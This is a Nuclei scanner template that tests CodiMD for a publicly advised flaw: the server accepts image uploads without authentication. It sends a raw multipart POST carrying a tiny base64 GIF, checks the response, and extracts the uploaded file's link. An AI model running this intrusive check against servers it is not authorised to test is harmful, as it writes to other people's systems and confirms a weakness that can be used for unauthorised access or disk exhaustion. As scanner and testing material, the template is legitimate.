mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-01 16:23:32 +08:00
49 lines
1.7 KiB
YAML
49 lines
1.7 KiB
YAML
id: codimd-unauth-file-upload
|
|
|
|
info:
|
|
name: CodiMD - File Upload
|
|
author: denandz,PulseSecurity.co.nz
|
|
severity: medium
|
|
description: |
|
|
CodiMD does not require valid authentication to access uploaded images or to upload new image data. An attacker who can determine an uploaded image's URL can gain unauthorised access to uploaded image data, or can create a denial of service condition by exhausting all available disk space.
|
|
reference:
|
|
- https://github.com/hackmdio/codimd/security/advisories/GHSA-2764-jppc-p2hm
|
|
- https://pulsesecurity.co.nz/advisories/codimd-missing-image-access-controls
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
shodan-query: html:"CodiMD"
|
|
tags: file-upload,intrusive,codimd
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /uploadimage HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161
|
|
|
|
-----------------------------92633278134516118923780781161
|
|
Content-Disposition: form-data; name="image"; filename="{{randstr}}.gif"
|
|
Content-Type: image/gif
|
|
|
|
{{base64_decode("R0lGODlhAQABAIABAP///wAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==")}}
|
|
-----------------------------92633278134516118923780781161--
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- '"link":".*?.gif"'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- '"link":"(.*)"'
|
|
# digest: 4a0a00473045022100ef428961687368873537e6000fdd68686cadc910b6becdbba641b4d26a532d4102202e2b8c020d96ee350519c007eeeceb62b43ca94390f272611b8671b254a05642:922c64590222798bb761d5b6d8e72950 |